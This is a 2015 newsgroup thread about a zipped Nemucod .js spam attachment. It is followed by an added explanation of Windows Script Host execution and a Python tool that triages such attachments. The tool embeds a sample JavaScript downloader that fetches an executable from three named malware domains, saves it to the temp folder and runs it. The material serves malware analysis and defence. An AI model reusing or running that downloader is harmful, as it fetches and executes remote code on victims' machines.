On Wed, 02 Sep 2015 10:47:57 -0400, Virus Man wrote:
> I got a spam today to an account hosted by my residential ISP but
> operated by Hotmail (i.e. Micro$haft). The originating IP of the spam
> indicated that the infected host uses the same ISP that I do.
>
> The payload was a zip-compressed obfuscated .js file, which was scanned
> here:
>
> https://www.virustotal.com/en/file/cabea50df557c862e39db28c4768435f3a730b5c6e6099db37dcd1fa6bc61ea0/analysis/1441202201/
>
> A unique name given to this malware seems to be "Nemucod".
>
> A de-obfuscated display of this file can be found here:
>
> http://wepawet.iseclab.org/view.php?hash=ed7c3a57a60f35e14d78a268bb4ff3e7&type=js
>
> "No exploits were identified"
>
> Perhaps not - but the code obviously directs the reader to download an
> executable from one of these domains:
>
> etqy.com ihaveavoice2.com riggst.com
>
> Can anyone here explain how, or under what conditions, this
> zip-compressed .js file was intended or would have been executed on a
> recipient's machine by performing a single click-action on the payload
> attachment link?
>
> Can anyone explain Macro$hit's failure to scan and detect this file as a
> malicious attachment on their Hotmail server?
Don't know. I use Linux so I don't have to care.
--- NewsGate v1.0 gamma 2
* Origin: News Gate @ Net396 -Huntsville, AL - USA (1:396/4)
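On the mechanics behind the question above: Windows associates the .js extension with Windows Script Host (wscript.exe), so once the recipient opens the zip in Explorer and double-clicks the script inside it, the script runs with that user's privileges and can instantiate COM objects (MSXML2.XMLHTTP to fetch, ADODB.Stream to write the response to disk, WScript.Shell to run the result), which is all a downloader of this kind needs. The following Python triage script is an added example, not code from this post, from Hotmail, or from the Nemucod sample: it unpacks a zipped attachment, re-joins split string literals (a naive de-obfuscation step; heavily obfuscated variants will need properly de-obfuscated text such as Wepawet produces), and reports which WSH primitives each script instantiates and which domains it contacts. The embedded SAMPLE_JS is constructed for this example: the three domains come from the post, the URL paths and every other line of it are invented.

```python
import io
import re
import zipfile

# Windows Script Host COM objects a double-clicked .js can instantiate.
# Fetch + write + run together is the classic downloader shape.
WSH_PRIMITIVES = {
    "MSXML2.XMLHTTP": "HTTP download",
    "Microsoft.XMLHTTP": "HTTP download",
    "ADODB.Stream": "write response bytes to disk",
    "Scripting.FileSystemObject": "file system access",
    "WScript.Shell": "run a process",
}
# ProgIDs are case-insensitive, so match on lower-case and report the canonical name.
WSH_LOWER = {name.lower(): name for name in WSH_PRIMITIVES}

ACTIVEX_RE = re.compile(r'ActiveXObject\s*\(\s*["\']([^"\']+)["\']', re.I)
URL_RE = re.compile(r'https?://([a-z0-9.-]+\.[a-z]{2,})', re.I)
# "ht" + "tp"  ->  "http": the cheapest string-splitting trick, undone here.
JOIN_RE = re.compile(r'"\s*\+\s*"|\'\s*\+\s*\'')

# Constructed stand-in for the attachment; NOT the Nemucod file from the post.
# Domains are the three named in the post, the paths are invented.
SAMPLE_JS = r'''
var h = new ActiveXObject("MSX" + "ML2.XMLHTTP");
var s = new ActiveXObject("ADODB.Stream");
var w = new ActiveXObject("WScript.Shell");
var u = ["http://etqy.com/x", "http://ihaveavoice2.com/x", "http://riggst.com/x"];
var fn = w.ExpandEnvironmentStrings("%TEMP%") + "\\dl.exe";
for (var i = 0; i < u.length; i++) {
  h.open("GET", u[i], false); h.send();
  if (h.status == 200) { s.open(); s.type = 1; s.write(h.responseBody);
    s.saveToFile(fn, 2); s.close(); w.Run(fn, 0, false); break; }
}
'''


def extract_scripts(zip_bytes):
    """Return {name: text} for every .js/.jse/.wsf member of the attachment."""
    out = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.filename.lower().endswith((".js", ".jse", ".wsf")):
                out[info.filename] = zf.read(info).decode("utf-8", "replace")
    return out


def normalize(js):
    """Naive de-obfuscation: re-join adjacent string literals split with '+'."""
    return JOIN_RE.sub("", js)


def triage_script(js):
    """Static triage of one script: WSH primitives used, domains contacted,
    and a verdict ('downloader' = it can both fetch over HTTP and run a process)."""
    text = normalize(js)
    seen = {m.group(1).lower() for m in ACTIVEX_RE.finditer(text)}
    primitives = sorted(WSH_LOWER[p] for p in seen if p in WSH_LOWER)
    domains = sorted({m.group(1).lower() for m in URL_RE.finditer(text)})
    fetches = any(WSH_PRIMITIVES[p] == "HTTP download" for p in primitives)
    executes = "WScript.Shell" in primitives
    return {"primitives": primitives, "domains": domains,
            "downloader": fetches and executes}


def triage_attachment(zip_bytes):
    """Triage every script inside a zipped attachment."""
    return {name: triage_script(js) for name, js in extract_scripts(zip_bytes).items()}


def build_zip(name, js):
    """Build an in-memory zip holding one script (constructs the sample input)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(name, js)
    return buf.getvalue()


if __name__ == "__main__":
    for name, result in triage_attachment(build_zip("invoice.js", SAMPLE_JS)).items():
        print(name, result)
```

The verdict is deliberately narrow (fetch plus run), so a script that only contacts the three domains without instantiating WScript.Shell is reported with its domains but not flagged; tighten or loosen that to taste. The control that answers the original question directly is on the endpoint rather than the mail server: re-associate .js/.jse/.wsf with Notepad, or disable Windows Script Host by setting the DWORD `Enabled` to 0 under `HKLM\SOFTWARE\Microsoft\Windows Script Host\Settings`, after which a double-clicked attachment no longer runs.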